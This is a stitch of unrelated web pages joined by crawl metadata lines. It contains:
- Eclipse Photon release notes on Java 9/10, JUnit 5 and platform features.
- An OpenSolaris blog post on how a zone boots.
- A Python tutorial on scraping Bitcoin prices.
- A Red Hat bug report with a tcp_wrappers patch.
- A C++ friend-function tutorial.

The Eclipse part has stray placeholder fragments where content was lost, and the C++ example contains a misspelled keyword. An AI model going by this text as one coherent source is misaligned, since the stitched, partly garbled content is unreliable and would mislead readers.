discussion below!
https://www.raywenderlich.com/4428/how-to-mask-a-sprite-with-cocos2d-2-0
CC-MAIN-2018-13
refinedweb
2,210
56.66
Java™ development tools Java™ 10 Support Eclipse support for Java™ 10 The Eclipse compiler for Java (ECJ) implements the new Java 10 language enhancement which is the support for local variable type inference (JEP 286). Addition of Java 10 JRE A Java 10 JRE is recognized by Eclipse for launching. It can be added from the Window > Preferences > Java > Installed JREs > Add… page. It can be added from the Package Explorer as well using the project’s context menu. An option to set compiler compliance to 10 on a Java project is provided. Support for var compilation Eclipse supports compilation of var as shown below: When the type of var cannot be inferred, it is flagged as a compiler error as expected. An example is shown below: Code Completion for var Code completion is offered at places where var is allowed. Code completion of var is not offered at places where var is not allowed. Hover over var shows the javadoc of the inferred type. Quick Assist to convert from var to the appropriate type is provided. Quick Assist to convert from type to var is provided. Java™ 9 Support Eclipse support for Java™ 9 The Eclipse compiler for Java (ECJ) implements all the new Java 9 language enhancements"): On the Contents tab individual modules inside a container like JRE System Library can be included or excluded by moving the module from left-to-right or vice versa. Modules shown in the lower right box are implicitly included, because they are required by one or more modules in the upper right box. On the Details tab the encapsulation of given modules can be further influenced. The following example shows how module module.one can be made to export one of its packages to the module of the current Java project: Toggling Defines one or more modules (see above screenshot) lets you specify whether a given regular (non-modular) jar file or project should be considered as an "automatic module". As a consequence of changes here, the entry will move to the Modulepath or Classpath accordingly. Fix is applicable if the project is a Java9 project and has a module-info.java. The Quick Fix can be invoked from the editor: Before the Quick Fix is applied the module-info file looks as below After the Quick Fix is invoked, ` module-info.java` will be updated to include Fix is applicable if the project is a Java9 project and has a module-info.java file. The Quick Fix can be invoked from the editor: Before the Quick Fix is applied, the module-info file looks as below After the Quick Fix is invoked, ` module-info.java` will be updated to include requires 'MODULE_NAME' After the Quick Fix is applied, the required import statement is added to the file reporting error. This Quick Fix is applicable if the project is a Java9 project and has a module-info.java file. The Quick Fix can be invoked from the editor: When the service is a class, the Quick Fix is proposed for creating a class. When the service is an interface or an annotation, two Quick Fixes are proposed for creating a class or an interface. New --release on the Java compiler preference page. Use --release option for Default Access rules and EE descriptor. Paste module-info.java code in Package Explorer You can now paste a snippet of code representing module-info.java directly into a source folder to create a module-info.java file. For example, copy this code: import java.sql.Driver; module hello { exports org.example; requires java.sql; provides Driver with org.example.DriverImpl; } Then, select a source folder in a Java 9 project in the Package Explorer view and use Ctrl+V (Edit > Paste) to paste it. This automatically creates a module-info.java file in the source folder with the copied content. Content assist for module declaration name Content assist (Ctrl+Space) support is now available for module declaration name. Quick Fix for unresolved module on module name in requires directive A new Quick Fix is offered on requires statements in the module-info.java file to fix issues that are reported due to unresolved module. The below Quick Fix will be provided if the module related to the unresolved module error has its related classpath added to the classpath and not to the module path.: Quick Fix for Non-existing or empty package on ` exports directive` A new Quick Fix is available when you have a ` non-existing or an empty package` in an exports directive in module-info.java file. This Quick Fix is applicable if the project is a Java9 project or above and has a module-info.java file. The Quick Fix can be invoked from the editor: A Quick Fix is provided to create either a Class, or an Interface or an Annotation or an Enum in the given package. If the package does not exist, a new package is created and the new element is created in the package. Creation of module-info.java file on creation of a new Java9 Project When creating a Java project with compliance Java 9 or above, a new option is offered for the creation of the module-info.java file. A new checkbox has been added in the Java Settings page (Page 2) of the New Java Project wizard. See images below. Page 1: Page 2: The new checkbox for the creation of module-info.java file is checked by default. When this checkbox is checked, upon project creation, the dialog for creation of a new ` module-info.java ` file will appear. Selecting Don’t Create in the above dialog does not create the module-info.java file, but creates the project. Overriding modular build path dependencies for launching Based on Java build path, a Java 9 module can have command line options. These options from build path can be overridden for launching programs in the module. Override Dependencies button has been added to Dependencies tab: Dialog can be used to override modular dependencies: JUnit Eclipse support for JUnit 5.1: . Java Editor Quick Fix to add @NonNullByDefault to packages A new Quick Fix is offered to fix issues that are reported when the Missing '@NonNullByDefault' annotation on package warning is enabled. If the package already has a package-info.java, the Quick Fix can be invoked from the editor: Otherwise, the Quick Fix must be invoked from the problems view, and will create a package-info.java with the required annotation: _58<<. _62<< After: _64<< Test source folders and dependencies are shown with a darker icon in the build path settings, the package explorer and other locations. This can be disabled in Preferences > Java > Appearance: _66<<: _78<< OFF ON _81<< '.' is the special regex character while the second '.' is escaped to denote that this is a normal character. @NonNullByDefault per module If a module is annotated with @NonNullByDefault, the compiler will interpret this as the global default for all types in this module: @org.eclipse.jdt.annotation.NonNullByDefault module my.nullsafe.mod { … Note, however, that this requires an annotation type declared with target ElementType.MODULE. Since the annotation bundle org.eclipse.jdt.annotation is still compatible with Java 8, it cannot yet declare this target. In the interim, a preview version of this bundle with support for modules will be published by other means than the official SDK build. @NonNullByDefault improvements). Support for @NonNullByDefaultannotations that are targeted at parameters has been implemented. Multiple different @NonNullByDefaultannotations (especially with different default values) may be placed at the same target, in which case the sets of affected locations are merged. Annotations which use a meta annotation @TypeQualifierDefaultinstead of a DefaultLocation-based specification are now understood, too, e.g. @org.springframework.lang.NonNullApi. Version 2.2.0 of bundle org.eclipse.jdt.annotations containing an annotation type NonNullByDefault that can be applied to parameter and module declarations (in addition to the previously allowed targets). Test sources There is now support for running Java annotation processors on test sources. The output folder for files generated for these can be configured in the project properties in Java Compiler > Annotation Processing as Generated test source directory. _83<<_84<<. _91<< Debug Launch configuration prototypes for Java Launch Configurations A Java Launch Configuration can now be based on a prototype. A prototype seeds attributes in its associated Java Launch Configurations with the settings specified in the Prototype tab. _94<< Advanced source lookup implementation > Enable advanced source lookup preference option: _96<< Similarly, when an exception breakpoint is hit, the exception being thrown is shown. JDT Developers Package binding with recovery The existing method IBinding#getJavaElement() now accommodates recovered packages in which case a null may be returned for such package bindings with problems. Pre-Java 9 compliant code will continue to have a non-null return value for this API for packages. Support for Regex Module Declaration Search The existing method SearchPattern#createPattern(String , int , int , int ) is enhanced for supporting regular expression search for module declarations. Please note that the flag SearchPattern#R_REGEXP_MATCH used for regular expression search is applicable exclusively for module declarations. No other flag (for eg. SearchPattern#R_CASE_SENSITIVE) should be used in disjunction with this match rule. PHP Development Tools General Fixed support for ASP tags Editor Async code completion Improved code assist for @vartags Fixed highlighting for projects with duplicated classes in validation paths Fixed memory leak in PHP editors Improved superglobal highlighting Fixed highlighting for parentkeyword Method overriding support PHP 7 return types Consistent tooltip for constants defined via defineand constkeywords Improved highlighting for try/catch/finally statement Formatter Formatter preferences always use latest supported PHP version Support braces configuration for traits Stable formatter results No more "double spaces" around expressions New "Line Wrapping" becomes "Keep trailing comma" Formatter no longer produce "TextEdits" in places where code isn’t really touched Platform Windows Improved Tree and Table widget scaling at high DPI on Windows Trees and Tables scale Checkboxes and expand/collapse buttons properly. Dropped support for Windows XP Eclipse/SWT has dropped support for the Windows XP Operating System and other Windows versions older than Windows Vista. Microsoft support for Windows XP, including security updates, ended in April 2014 and Windows XP has not been listed as a target environment for the Eclipse Platform for several years. MacOS Improved readability of default text font on macOS Reading the source code is the task developers perform the most during coding. So text editors must assist the user as good as possible with that. On macOS Eclipse Photon now uses the "Menlo" font as the default text font, which does also contain bold font faces. This increases readability in source code editors using bold font faces: Dark buttons on Mac The background color of a button can now be styled on the Mac. This is used to style the buttons in the dark theme. GTK3 Improved caret performance on GTK3 Caret performance on the SWT GTK3 port has been enhanced to allow for smoother drawing. Previously the caret stuttered when moved or when other controls in the same shell were manipulated. Now the caret moves smoothly and blinks at a consistent rate. Accessibility support on GTK3 Significant improvements have been made in the Accessibility support on the SWT Linux/GTK3 port. Users are able to use assistive technologies seamlessly with SWT GTK3, just as they were able to with GTK2, and without any hangs or crashes. GTK_THEME override support for SWT-GTK3 Eclipse SWT on GTK3.14+ now supports the use of GTK_THEME as an environment variable. SWT applications are correctly styled when using the GTK_THEME environment variable to override the system theme, and/or specify a dark variant. Below are the before and after screenshots of ControlExample running with GTK_THEME=Adwaita:dark set. Before: After: Editors Manage associations of content types with editors The Content Types preference page was extended to allow to view, create and remove associations with editors. Using the content type to define editor association is to be preferred over using the File Associations preferences. Associate content type with a file name pattern From the Preferences > General > Content Types preference page, you can now associate a content type with a file name pattern and use ? or * wildcards at any place in that pattern (respectively to match any character or any string). Browser Editor can toggle auto-refresh The Browser Editor now contains a drop down option for enabling auto-refresh for local pages. When enabled, the Browser Editor will automatically refresh if the opened file is edited and saved. CodeMining support with SourceViewer A code mining represents a content (ex: label, icons) that should be shown along with source text, like the number of references, a way to run tests (with run/debug icons), etc. The main goal of code mining is to help developer to understand more the written/writing code A code mining is represented by org.eclipse.jface.text.codemining.ICodeMining which are provided by org.eclipse.jface.text.codemining.ICodeMiningProvider The org.eclipse.jface.text.source.ISourceViewerExtension5 provides the capability to register org.eclipse.jface.text.codemining.ICodeMiningProvider and update code minings. The example CodeMiningDemo draws classes references / implementations code minings: Dark Theme Improved text operation icons for the dark theme The block selection, word warp and show whitespace icons have been adjusted to look good in the dark theme. Before: After: Improved popup dialogs for the dark theme Popup dialogs as for example the platform’s update notification popup now uses a dark background and a light foreground color in the dark theme. Improved text color in text editor for the dark theme The text editor now uses an improved font color in the dark theme so that you can read better. Improved coloring of links in code element information in the dark theme The colors of links in code element information controls now take the color settings of the "Hyperlink text color" and the "Active hyperlink text color" from the "Colors & Fonts" preference page into account. The readability in the dark theme has been improved a lot by this. Before: After: Improved the text editor’s expand and collapse nodes for the dark theme The collapse and expand nodes in the text editor’s left hand side ruler were improved for the dark theme. Improved the generic editor’s mark occurrences annotation color for the dark theme The occurrences annotation marker color in the generic editor’s left hand side ruler were improved for the dark theme. Image is zoomed for better visibility. Canvas elements are styled in the default dark theme The default dark theme now contains CSS for styling Canvas elements by default. Old: New: Other Open resource dialog highlights matching characters The matching characters from the filter are now highlighted in the Open Resource dialog. Import/export preferences from preference dialog Easily accessible buttons for opening the Import/Export preferences wizards have been added to the lower left corner of the Preferences dialog. The wizards are still accessible through the File > Import… and File > Export… wizards. Expanded Highlighting in Open Resource Dialog The Open Resource dialog now shows you how the search term matches the found resources by highlighting the names based on camel-case and pattern ( * and ? ) searches. Undo/Redo Toolbar Buttons The main toolbar can now show Undo and Redo buttons. The buttons are not available by default. They can be added via Window > Perspective > Customize Perspective…: QuickAccess matches Preference pages by keyword QuickAccess ( Ctrl+3) now also returns Preference pages that have a keyword matching user input. Perfect matches appear first in selection dialogs Within selection dialogs, including Open Type and Open Resource, perfect matches appear as the first result, ensuring that users no longer have to scroll through historical matches and the alphabetically sorted list to find their desired result. Delete nested projects The Delete Resources dialog now shows a Delete nested projects option to delete all projects whose location on file system is a descendant of one of the selected projects. Debug perspective layout changed Default Debug perspective layout changed, see screenshot below. The aim is to give the editor area more space and to show more relevant information without scrolling. Display view, Expressions view and Project Explorer are now shown by default, Problems view replaces Tasks. Workers use job names as thread names The jobs framework now uses Job names for Worker thread names. Previously all running Worker’s got enumerated thread names, without any hint what the current `Worker is actually doing: Now the Job name is added next to the Worker name: Right click option to export Launch Configurations The Export Launch Configurations Wizard is now accessible through the right click menu on Launch Configurations. This wizard is still available with File > Export > Run/Debug > Launch Configurations Flat layout in tabbed properties view In the light theme the tabbed properties view now completely uses the same flat styling as the form-based editors do. Open/Close Projects by Working Set in Project Explorer The ability to Open, Close, Close Unrelated, and Build all appropriate projects in a Working Set has been added to the right click menu of Working Sets in the Project Explorer. Modify project natures The Project Properties dialog now features a page to add or remove natures on a project. As mentioned on the page, some natures may not properly handle manual addition/removal, so using this can lead to some inconsistencies in those cases. Possibility to configure the color of text editor’s range indicator The text editor’s range indicators’s color can now be configured via the Colors and Fonts preference page. Styling for text editor’s range indicator The Eclipse default dark theme now includes styling for the text editor’s range indicator. Allow workspace to build projects in parallel The Workspace preference page now has a new option to allow the workspace to build projects in parallel: Under some safe circumstances, the workspace can now choose to build independent projects in parallel. In such case, the maximum amount of jobs/threads that will be running builds in parallel will be controlled by this preference. A value of 1 will indicate that build won’t be parallelized keeping the legacy behavior. The optimal value will depend on the machine and workspace projects specificities. Recommendation is to try relatively low values (such as 4) first which will allow to save time, when allowed by projects, while not risking the CPU overload. Refresh on access on by default For years the Eclipse IDE is shipping with a customization that files are automatically refreshed if the user accesses them. Other Eclipse based tools like the Spring Tools Suite were missing this customization, so now they do not have to manually instruct their IDE to see the update. Open resource dialog always shows the paths You can now use the Open Resource dialog to see the file paths. Previously it only showed the paths if there were duplicate entries. Open Source Projects The following Eclipse open source projects participated in this release. - Eclipse Accessibility Tools Framework - - - - - - - Eclipse Business Intelligence and Reporting Tools Eclipse C/C++ Development Tools: New in CDT 9.5 - Eclipse Code Recommenders - Eclipse Communication Framework - - Eclipse Data Tools Platform Eclipse Dynamic Languages Toolkit - - - - - - - - - - - - Eclipse Extended Editing Framework Eclipse Generation Factories Eclipse Git Team Provider - Eclipse Graphical Editing Framework - Eclipse Java development tools: New features for Java developers - Eclipse Java Workflow Tooling Eclipse JavaScript Development Tools - - - - - - Eclipse Lua Development Tools - Eclipse Marketplace Client Project Eclipse Maven Integration for Web Tools Platform - Eclipse Modeling Workflow Engine - - - - - - - - - - - Eclipse Packaging Project - - Eclipse Parallel Tools Platform Eclipse PHP Development Tools: New in 6.0 Eclipse Platform: New features in the Platform, New APIs in the Platform and Equinox Eclipse Plug-in Development Environment: New features for plug-in developers Eclipse Presentation Modeling Framework - - - - - Eclipse Remote Application Platform - - - - - - Eclipse Target Communication Framework Eclipse Target Management - Eclipse Tools for Cloud Foundry - - - - - - Eclipse Web Tools Platform Project - - - - - - - -
http://www.eclipse.org/photon/noteworthy/index.php
CC-MAIN-2018-47
refinedweb
3,329
51.07
Scraping websites for historical Bitcoin data using Python In this post we will be scraping websites (coinmarketcap.com) for historical bitcoin data using BeautifulSoup and Python. Furthermore, the data is processed and put into a Pandas dataframe. After that, the historical Bitcoin data is used to plot a candlestick graph. Scraping websites for data First of all, web scraping techniques are used to extract data from websites. Also, this is helpful in case no API is provided to receive data from websites. Websites are build on HTML, therefore we need to extract our data from HTML code. Here, we are using Python and the powerful library BeatifulSoup. BeatifulSoup is probably one of the best libraries to pull out data from HTML files. You can view the HTML code in every Browser for instance in Firefox: Firefox > Web Developer > Page Source. Scraping coinmarketcap.com In the following, we are going to scrape the historical Bitcoin data (date, open, high, low, close, volume, market_cap) from coinmarketcap.com. Python Code First, let us have a look at the HTML snippet we are going to process. After that, let us have a look at the necessary steps: - First provide a link to target website - Connect to server and pull HTML data - Select the section of interest, here it is ‘table-responsive’. Afterwards, search for the desired table rows (‘tr’). - Loop over rows, extract the .text data and put them into a temporary list (tmp). After that, we remove unnecessary commas from the data, transform the date string into a datetime object. Furthermore, strings are transformed into floats since they are numbers. - Make a pandas dataframe (df) from the list (data). You can view and download the entire Python code in this Github repository. Results The main result of the proposed method is a Pandas dataframe with all desired data. Hence, it contains the date as a datetime object. The prices (open, high, low, close), the volume and the market capitalization. Afterwards, we can use the data within the dataframe to plot a candlestick chart. Now, let’s have a look at the Python code for the candlestick chart. from plotly.tools import FigureFactory as FF fig = FF.create_candlestick(df['open'], df['high'], df['low'], df['close'], dates=df['date']) fig['layout'].update({ 'title': 'Bitcoin price development', 'yaxis': {'title': 'Bitcoin in USD'} }) pyo.offline.plot(fig) Finally, here you go with the Bitcoin candlestick chart. Furthermore, you can also use the scraped historical data to perform Monte Carlo simulations. Conclusion We can use the Python library BeautifulSoup to parse the HTML code of websites and pull data from it. This is also called scraping websites. Furthermore, we can transform this data into the desired data formats (datetime and floats). For instance, we used the data to plot a candlestick chart. What do you think? I’d like to hear what you think about this post. Let me know by leaving a comment below and don’t forget to subscribe to this blog!
https://numex-blog.com/scraping-websites-for-historical-bitcoin-data-using-python/
CC-MAIN-2019-13
refinedweb
497
66.84
These Boots are Made for Walkin' By User12607341-Oracle on Jun 14, 2005 One of the most gratifying and exciting aspects of the OpenSolaris project is a return (for me, at least) to working on operating system design and research with the larger, open community. In another era while I was an undergraduate at Berkeley, I was fortunate enough to see the 2.x and 4.x BSD development effort up close and to see the larger community formed between the University and external organizations that had UNIX source licenses. It was not an open source community, of course, but it was a community none the less, and one that shared fixes, ideas and other software projects built on top of the operating system. Our hopes for OpenSolaris are that in addition to releasing operating system source code that can be used for many different purposes, Sun and the community will innovate together while maintaining the core values that Solaris provides today. One of the many pieces of OpenSolaris which is of personal interest is the Zones virtualization technology introduced in Solaris 10. Zones provide a lightweight but very efficient and flexible way of consolidating and securing potentially complex workloads. There is a wealth of technical information about Zones in Solaris available at the OpenSolaris Zones Community and the BigAdmin System Administration Portal. One of the things about Zones that people notice right away is how quickly they boot. Of course, booting a zone does not cause a system to run its power-on self-test (POST) or require the same amount of initialization that takes place when the hardware itself is booting. However, I thought it might be useful to do a tour of the dance that takes place when a non-global zone is booted. I call it a dance since there is a certain amount of interplay between the primary players - zoneadm, zoneadmd and the kernel itself - that warrants an explanation. Although the virtualization that Zones provides is spread throughout the source code, the primary implementation in the kernel can be found in zone.c. As with many OpenSolaris frameworks, there is a big block comment at the start of the file which is very useful for understanding the lay of the land with respect to the code. Besides describing the data structures and locking strategy used for Zones, there is a description of the states a zone can be in from the kernel's perspective and at what points a zone may transition from one state to another. For brevity, only the states covered during a zone boot are listed here ... \* \* Zone States: \* \* The states in which a zone may be in and the transitions are as \* follows: \* \* ZONE_IS_UNINITIALIZED: primordial state for a zone. The partially \* initialized zone is added to the list of active zones on the system but \* isn't accessible. \* \* ZONE_IS_READY: zsched (the kernel dummy process for a zone) is \* ready. The zone is made visible after the ZSD constructor callbacks are \* executed. A zone remains in this state until it transitions into \* the ZONE_IS_BOOTING state as a result of a call to zone_boot(). \* \* ZONE_IS_BOOTING: in this shortlived-state, zsched attempts to start \* init. Should that fail, the zone proceeds to the ZONE_IS_SHUTTING_DOWN \* state. \* \* ZONE_IS_RUNNING: The zone is open for business: zsched has \* successfully started init. A zone remains in this state until \* zone_shutdown() is called. ... It is important to note here that there are a number of zone states not represented here - those are for zones which do not (yet) have a kernel context. An example of such a state is for a zone that is in the process of being installed. These states are defined in libzonecfg.h. One of the players in the zone boot dance is the zoneadmd process which runs in the global zone and performs a number of critical tasks. Although much of the virtualization for a zone is implemented in the kernel, zoneadmd manages a great deal of a zone's infrastructure as outlined in zoneadmd.c /\* \* zoneadmd manages zones; one zoneadmd process is launched for each \* non-global zone on the system. This daemon juggles four jobs: \* \* - Implement setup and teardown of the zone "virtual platform": mount and \* unmount filesystems; create and destroy network interfaces; communicate \* with devfsadmd to lay out devices for the zone; instantiate the zone \* console device; configure process runtime attributes such as resource \* controls, pool bindings, fine-grained privileges. \* \* - Launch the zone's init(1M) process. \* \* - Implement a door server; clients (like zoneadm) connect to the door \* server and request zone state changes. The kernel is also a client of \* this door server. A request to halt or reboot the zone which originates \* \*inside\* the zone results in a door upcall from the kernel into zoneadmd. \* \* One minor problem is that messages emitted by zoneadmd need to be passed \* back to the zoneadm process making the request. These messages need to \* be rendered in the client's locale; so, this is passed in as part of the \* request. The exception is the kernel upcall to zoneadmd, in which case \* messages are syslog'd. \* \* To make all of this work, the Makefile adds -a to xgettext to extract \*all\* \* strings, and an exclusion file (zoneadmd.xcl) is used to exclude those \* strings which do not need to be translated. \* \* - Act as a console server for zlogin -C processes; see comments in zcons.c \* for more information about the zone console architecture. \* \* DESIGN NOTES \* \* Restart: \* A chief design constraint of zoneadmd is that it should be restartable in \* the case that the administrator kills it off, or it suffers a fatal error, \* without the running zone being impacted; this is akin to being able to \* reboot the service processor of a server without affecting the OS instance. \*/ When a user wishes to boot a zone, zoneadm will attempt to contact zoneadmd via a door that is used by all three components for a number of things including coordinating zone state changes. If for some reason zoneadmd is not running, an attempt will be made to start it. Once that has completed, zoneadm tells zoneadmd to boot the zone by supplying the appropriate zone_cmd_arg_t request via a door call. It is worth noting that the same door is used by zoneadmd to return messages back to the user executing zoneadm and also as a way for zoneadm to indicate to zoneadmd the locale of the user executing the boot command so that messages are localized appropriately. Looking at the door server that zoneadmd implements, there is some straightforward sanity checking that takes place on the argument passed via the door call as well as the use of some of the technology that came in with the introduction of discrete privileges in Solaris 10. if (door_ucred(&uc) != 0) { zerror(&logsys, B_TRUE, "door_ucred"); goto out; } eset = ucred_getprivset(uc, PRIV_EFFECTIVE); if (ucred_getzoneid(uc) != GLOBAL_ZONEID || (eset != NULL ? !priv_ismember(eset, PRIV_SYS_CONFIG) : ucred_geteuid(uc) != 0)) { zerror(&logsys, B_FALSE, "insufficient privileges"); goto out; } kernelcall = ucred_getpid(uc) == 0; /\* \* This is safe because we only use a zlog_t throughout the \* duration of a door call; i.e., by the time the pointer \* might become invalid, the door call would be over. \*/ zlog.locale = kernelcall ? DEFAULT_LOCALE : zargp->locale; Using door_ucred, the user credential can be checked to determine whether the request originated in the global zone,1 whether the user making the request had sufficient privilege to do so2 and whether the request was a result of an upcall from the kernel. That last piece of information is used, among other things, to determine whether or not messages should be localized by localize_msg. It is within the door server implemented by zoneadmd that transitions from one state to another take place. There are two states from which a zone boot is permissible, installed and ready. From the installed state, zone_ready is used to create and bring up the zone's virtual platform that consists of the zone's kernel context (created using zone_create) as well as the zone's specific file systems (including the root file system) and logical networking interfaces. If a zone is supposed to be bound to a non-default resource pool, then that also takes place as part of this state transition. When a zone's kernel context is created using zone_create, a zone_t structure is allocated and initialized. At this time, the the status of the zone is set to ZONE_IS_UNINITIALIZED. Some of the initialization that takes place is in order to set up the security boundary which isolates processes running inside a zone. For example, the vnode_t of the zone's root file system, the zone's kernel credentials and the privilege sets of the zone's future processes are all initialized here. Before returning back to the zoneadmd command, zone_create adds the primordial zone to a doubly-linked list and two hash tables, 3 one hashed by zone name and the other by zone ID. These data structures are protected by the zonehash_lock mutex which is then dropped after the zone has been added. Finally a new kernel process is then created, zsched, which is where kernel threads for this zone are parented. After calling newproc to create this kernel process, zone_create will wait using zone_status_wait until the zsched kernel process has completed initializing the zone and has set its status to ZONE_IS_READY. Since the user structure of the process initialization has not been completed, the first thing the new zsched process does is finish that initialization along with reparenting itself to PID 1 (the global zone's init, process). And since the future processes to be run within the new zone may be subject to resource controls, that initialization takes place here in the context of zsched. After grabbing the zone_status_lock mutex in order to set the status to ZONE_IS_READY, zsched will then suspend itself, waiting for the zone's status to been changed to ZONE_IS_BOOTING. Once the zone is in the ready state, zone_create returns control back to zoneadmd and the door server continues the boot process by calling zone_bootup This initializes the zone's console device, mounts some of the standard OpenSolaris file systems like /proc and /etc/mnttab and then uses the zone_boot system call to attempt to boot the zone. As the comment that introduces zone_boot points out, most of the heavy lifting has already been done either by zoneadmd or by the work the kernel has done through zone_create. As this point, zone_boot saves the requested boot arguments after grabbing the zonehash_lock mutex and then further grabs the zone_status_lock mutex in order to set the zone status to ZONE_IS_BOOTING. After dropping both locks, it is zone_boot that suspends itself waiting for the zone status is be set to ZONE_IS_RUNNING. Since the zone's status has now been set to ZONE_IS_BOOTING, zsched now continues where it left off after it has suspended itself with its call to zone_status_wait_cpr After checking that the current zone status is indeed ZONE_IS_BOOTING, a new kernel process is created in order to run init in the zone. This process calls zone_icode which is analogous to the traditional icode function that is used to start init in the global zone and in traditional UNIX environments. After doing some zone-specific initialization, each of the icode functions end up calling exec_init to actually exec the init process after copying out the path to the executable, /sbin/init, and the boot arguments. If the exec is successful, zone_icode will set the zone's status to ZONE_IS_RUNNING and in the process, zone_boot will pick up where it had been suspended. At this point, the value of zone_boot_err indicates whether the zone boot was successful or not and is used to set the global errno value for zoneadmd. There are two additional things to note with the zone's transition to the running state. First of all, audit_put_record is called to generate an event for the Solaris auditing system so that it's known which user executed which command to boot a zone. In addition, there is an internal zoneadmd event generated to indicate on the zone's console device that the zone is booting. This internal stream of events is sent by the door server to the zone console subsystem for all state transitions, so that the console user can see which state the zone is transitioning to. 1 This is a bit of defensive programming since unless the global zone administrator were to make the door in question available through the non-global zone's own file system, there would be no way for a privileged user in a non-global zone to actually access door used by zoneadmd. 2 zoneadm itself checks that the user attempting to boot a zone has the necessary privilege but it's possible some other privileged process in the global zone might have access to the door but lack the necessary PRIV_SYS_CONFIG privilege. 3 The doubly-linked list implementation was integrated by Dave while Dan was responsible for the hash table implementation. Both of these are worth examining in the OpenSolaris source base. Technorati Tag: Containers Technorati Tag: OpenSolaris Technorati Tag: Solaris Technorati Tag: Virtualization Technorati Tag: Zones Posted by johnh on February 01, 2007 at 07:08 AM PST # Posted by Andy Tucker on February 01, 2007 at 07:08 AM PST #
https://blogs.oracle.com/comay/entry/these_boots_are_made_for
CC-MAIN-2015-48
refinedweb
2,219
55.27
Red Hat Bugzilla – Bug 141110 bug in table_match leads to segfault of process executing hosts_ctl Last modified: 2007-11-30 17:10:55 EST From Bugzilla Helper: User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0 Description of problem: It first occured with slapd deamon when I tried to run stress test on ldap-server. If one opens too may connection to slapd process, slapd will receive SEG_FAULT eventually Last message submitted to the log before the crash is: slapd[xxxx]: warning: cannot open /etc/hosts.allow: Too many open files When I started to investigate that, I find out, that crash happens du to the following bug in table_match function in tcp_wrappers: int table_match(...) { /*sh_cmd variable is declared but not initialized here*/ match=NO; ... if ((fp=open())!=0) { .... /*Initialize sh_cmd here*/ .... } else if (errno != ENOENT) { tcpd_warn() match = ERR; } if (match) { /*Use sh_cmd here*/ } .... } So, it was assumed by developer, that match variable should be equal to YES in later if, but it tests it as non-zero. The following patch fixes this problem: --- tcp_wrappers_7.6/hosts_access.c.orig 2004-11-29 15:16:26.532074984 +0300 +++ tcp_wrappers_7.6/hosts_access.c 2004-11-29 15:15:47.500008760 +0300 @@ -177,7 +177,7 @@ tcpd_warn("cannot open %s: %m", table); match = ERR; } - if (match) { + if (match == YES) { if (hosts_access_verbose > 1) syslog(LOG_DEBUG, "matched: %s line %d", tcpd_context.file, tcpd_context.line); Version-Release number of selected component (if applicable): tcp_wrappers-7.6-37.2 How reproducible: Always Steps to Reproduce: 1.Make sure that you have hosts.allow and hosts.deny 2.Run slapd with DB large enough 3.Load it heavily, with something like this while /bin/true; do ldapsearch -x "objectClass=*" done Actual Results: slapd crashes Additional info: Created attachment 107553 [details] should fix this issue After studying .spec file I'd like to add few more comments: 1) This bug was introduced by tcp_wrappers-7.6-sig.patch 2) Another misbehaviour was added by that patch in host_access function. Originally it's tail was: if (table_match(hosts_allow_table, request)) return (YES); if (table_match(hosts_deny_table, request)) return (NO); return (YES); After tcp_wrappers-7.6-sig.patch it turned to: if (table_match(hosts_allow_table, request)) return (YES); if (table_match(hosts_deny_table, request) == NO) return (YES); return (NO); But it should be: if (table_match(hosts_allow_table, request) == YES) return (YES); if (table_match(hosts_deny_table, request) == NO) return (YES); return (NO); Patch to tcp_wrappers-7.6-37.2 which will fix both issue is attached to this comment Fixed in rawhide in rpm tcp_wrappers-7.6-39 or newer.
https://bugzilla.redhat.com/show_bug.cgi?id=141110
CC-MAIN-2017-09
refinedweb
432
58.69
Hi, Is it possible to count the number of datas fetched in a data source in readyapi? Can it be stored in a variable to use in the next steps. Thanks! Solved! Go to Solution. Hi @MKV Try below code: DSrowCount = testRunner.testCase.testSteps["DataSource"].rowCount log.info DSrowCount Do Like/Accept it as Solution if it solves your query. Thanks, Himanshu Tayal View solution in original post Thanks..It worked !! The problem is that the rowCount does not return the actual row count, in my case 200. I have to run my data source step manually first to create the rows and then rowCount will return the actual row count. When I try to automate this and I try to use: def tst = testRunner.runTestStepByName("myDataSource") DSrowCount = testRunner.testCase.testSteps["myDataSource"].rowCountlog.info DSrowCount it does not work. There are 200 rows in the datasource but the rowCount returns 1. Is there any way to make the rowCount return 200 instead of 1? Thanks
https://community.smartbear.com/t5/SoapUI-Pro/how-to-count-the-number-of-rows-fetched-in-data-source/m-p/170700/highlight/true
CC-MAIN-2020-24
refinedweb
165
76.62
Friend Function in C++ In this tutorial, we will learn about friend function in C++ and what is the use of it. let us see with some example program. What is a friend function? - A friend function is a non-member function of class which can access the private members/data of class. - It is declared using the keyword friend in all classes from which we need to access the private data members. - It is defined outside of all class, without using friend keyword and scope resolution operator - Friend function will be called without using any object. Class Member Function friends Here are examples of a class member functions declared friends: class DayOfYear { friend Date :: Date(const class DayOfYear&); friend Date :: operator DayOfYear(); // ... }; The friend declaration uses the class keyword to make a forward reference to the Date class, which has not been defined yet. This technique works because the DayOfYear class needs no details of the implementation of the Date class. To Declare specific member functions as friends, the definition of the class with the member functions must be in scope. In this case, this means the Date class must be defined before the DayOfYear class . Non-member Function friends A class can specify that a non-member function in the program is a friend to the class , as in this example: class Time { // ... freind void display(const Date&, const Time&); }; // --non member function void display(const Date& dt, const Time& tm) { // has access to the private members // of date and time objects } Program designs often use functions that are members of neither class to bridge objects of the classes to perform some action that involves both classes’ data members. Sometimes those functions are members functions of a third class and other times those functions are non-members functions. Overload operator functions are frequently non-member functions that are declared as friends of the classes upon which the overload operators work. Program to implement friend function in C++ #include<iostream> using namespace std; class A { private : int a,b; public :void getData() { cout<<"\n Enter any integers :"; cin>>a>>b; } friend void display(A); }; void display(A a1) { cout<<"\n a: "<<a1.a<<"\n b : "<<a1.b; } int main() { A a; a.getData(); display(a); } Output from Program: Enter any integers: 4 5 a: 4 b: 5 Also, read:
https://www.codespeedy.com/friend-functions-in-cpp/
CC-MAIN-2019-43
refinedweb
390
60.24
